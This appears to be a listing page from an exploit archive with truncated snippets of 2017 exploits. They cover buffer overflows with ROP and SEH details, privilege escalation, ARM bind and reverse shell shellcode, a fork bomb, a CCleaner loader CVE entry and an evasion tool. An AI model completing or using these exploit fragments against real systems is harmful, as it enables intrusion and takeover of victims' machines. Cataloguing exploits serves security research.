ASX to MP3 converter < 3.1.3.7 - '.asx' Local Stack Overflow (DEP Bypass)

import struct,sys head =''' REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes''' offset 17375 junk = "A" 17375 0x1003df8e 0x774e1035 EIP="\x36\x10\x4e\x77" adjust="A" 4 def createropchain: ropgadgets = 0x73dd5dce, POP EAX RETN MFC42.DLL 0x5d091368, ptr to &VirtualProtect IAT COMCTL32.dll...

Easy MPEGAVIDIVXWMVRM to DVD - Enter User Name Local Buffer Overflow (SEH)

Easy MPEGAVIDIVXWMVRM to DVD - Enter User Name Local Buffer Overflow SEH !/usr/bin/python Exploit Title: Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow SEH Date: 05-10-2017 Exploit Author: Venkat Rajgor Vendor Homepage: http://www.divxtodvd.net/ Software Link:...

Linux/x86_64 - mkdir() 'evil' Shellcode (30 bytes)

Linux/x8664 - mkdir 'evil' Shellcode 30 bytes. Shellcode exploit for Linx86-64 platform / ;Title: Linux/x8664 - mkdir shellcode 30 bytes ;Author: Touhid M.Shaikh ;Contact: https://github.com/touhidshaikh ;Category: Shellcode ;Architecture: Linux x8664 ;Description: Create Folder with 755...

CyberLink LabelPrint < 2.5 - Buffer Overflow (SEH Unicode) Exploit

Exploit for windows platform in category local exploits !/usr/bin/python Exploit Title: CyberLink LabelPrint =2.5 File Project Processing Unicode Stack Overflow Date: September 23, 2017 Exploit Author: f3ci Vendor Homepage: https://www.cyberlink.com/ Software Link:...

Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Disk Pulse Enterprise GET Buffer Overflow', 'Description' = %q This module exploits an SEH buffer overflow in Disk Pulse Enterprise 9.9.16. If a...

VulnCheck KEV: CVE-2017-20201

CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191 32-bit builds contained a malicious pre-entry-point loader that diverts execution from scrtcommonmainseh into a custom loader. That loader decodes an embedded blob into shellcode, allocates executable heap memory, resolves Windows API...

Netdecision 5.8.2 - Local Privilege Escalation

// Netdecision.cpp : Defines the entry point for the console application. / Exploit Title: Netdecision 5.8.2 - Local Privilege Escalation - Winring0x32.sys Date: 2017.09.17 Exploit Author: Peter Baris Vendor Homepage: www.netmechanica.com Software Link: http://www.netmechanica.com/downloads/...

Netdecision 5.8.2 - Local Privilege Escalation

Netdecision 5.8.2 - Local Privilege Escalation // Netdecision.cpp : Defines the entry point for the console application. / Exploit Title: Netdecision 5.8.2 - Local Privilege Escalation - Winring0x32.sys Date: 2017.09.17 Exploit Author: Peter Baris Vendor Homepage: www.netmechanica.com Software...

Linux/ARM (Raspberry Pi) - Bind TCP Shell (4444/TCP) Shellcode (192 bytes)

/ Andrea Sindoni - @invictus1306 This schellcode is part of my episodes: - ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/ Enviroment: Raspberry pi 3 Default settings for port:4444 @.syntax unified .global start start: mov r1, 0x5C @ r1=0x5c mov r5, 0x11 @...

Linux/ARM (Raspberry Pi) - Reverse TCP Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)

/ Andrea Sindoni - @invictus1306 This schellcode is part of my episodes: - ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/ Enviroment: Raspberry pi 3 Default settings for port:4444 ip:192.168.0.12 .global start start: mov r1, 0x5C @ r1=0x5c mov r5, 0x11 @...

Linux/ARM (Raspberry Pi) - Bind TCP Shell (4444/TCP) Shellcode (192 bytes)

Linux/ARM Raspberry Pi - Bind TCP Shell 4444/TCP Shellcode 192 bytes. Shellcode exploit for ARM platform / Andrea Sindoni - @invictus1306 This schellcode is part of my episodes: - ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/ Enviroment: Raspberry pi 3...

DKMC - Malicious Payload Evasion Tool

Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. The idea is to avoid sandbox analysis since it's a simple "legit" image. For now the tool rely on PowerShell the execute the final...

Jungo DriverWizard WinDrive Overflow

-- coding: utf-8 -- """ Jungo DriverWizard WinDriver Kernel Pool Overflow Vulnerability Download: http://www.jungo.com/st/products/windriver/ File: WD1240.EXE Sha1: 3527cc974ec885166f0d96f6aedc8e542bb66cba Driver: windrvr1240.sys Sha1: 0f212075d86ef7e859c1941f8e5b9e7a6f2558ad CVE: CVE-2017-14153...

Linux/x86 - Fork Bomb Shellcode (9 bytes)

/ ;Title: Linux/x86 - Fork Bomb Shellcode ; Author: Touhid M.Shaikh ; Contact: https://github.com/touhidshaikh ; Category: Shellcode ; Architecture: Linux x86 ; Description: This shellcode may crash ur system if executed in ur sys. Length: 9 bytes ===COMPILATION AND EXECUTION=== nasm -f elf32...

Linux/x86 - Fork Bomb Shellcode (9 bytes)

Linux/x86 - Fork Bomb Shellcode 9 bytes. Shellcode exploit for Linx86 platform / ;Title: Linux/x86 - Fork Bomb Shellcode ; Author: Touhid M.Shaikh ; Contact: https://github.com/touhidshaikh ; Category: Shellcode ; Architecture: Linux x86 ; Description: This shellcode may crash ur system if execut...

Easy DVD Creator 2.5.11 - Buffer Overflow (SEH) Exploit

Exploit for windows platform in category local exploits !/usr/bin/python Exploit Title: Easy DVD Creator 2.5.11 - Buffer Overflow Windows 10 64bit, SEH Date: 26-08-2017 Exploit Author: tr0ubl3m4k3r Vulnerable Software: Easy DVD Creator Vendor Homepage: http://www.divxtodvd.net/ Version: 2.5.11...

Easy DVD Creator 2.5.11 Buffer Overflow

!/usr/bin/python Exploit Title: Easy DVD Creator 2.5.11 - Buffer Overflow Windows 10 64bit, SEH Date: 26-08-2017 Exploit Author: tr0ubl3m4k3r Vulnerable Software: Easy DVD Creator Vendor Homepage: http://www.divxtodvd.net/ Version: 2.5.11 Software Link: http://www.divxtodvd.net/easydvdcreator.exe...

Easy DVD Creator 2.5.11 - Local Buffer Overflow (SEH)

Easy DVD Creator 2.5.11 - Local Buffer Overflow SEH !/usr/bin/python Exploit Title: Easy DVD Creator 2.5.11 - Buffer Overflow Windows 10 64bit, SEH Date: 26-08-2017 Exploit Author: tr0ubl3m4k3r Vulnerable Software: Easy DVD Creator Vendor Homepage: http://www.divxtodvd.net/ Version: 2.5.11 Softwa...

Easy DVD Creator 2.5.11 - Local Buffer Overflow (SEH)

!/usr/bin/python Exploit Title: Easy DVD Creator 2.5.11 - Buffer Overflow Windows 10 64bit, SEH Date: 26-08-2017 Exploit Author: tr0ubl3m4k3r Vulnerable Software: Easy DVD Creator Vendor Homepage: http://www.divxtodvd.net/ Version: 2.5.11 Software Link: http://www.divxtodvd.net/easydvdcreator.exe...

Disk Pulse Enterprise 10.0.12 Buffer Overflow

!/usr/bin/python Exploit Title : Disk Pulse Enterprise v10.0.12 - Buffer Overflow Discovery by : Anurag Srivastava Email : [email protected] Website : www.pyramidcyber.com Discovery Date : 25/08/2017 Software Link : http://www.diskpulse.com/setups/diskpulseentsetupv10.0.12.exe...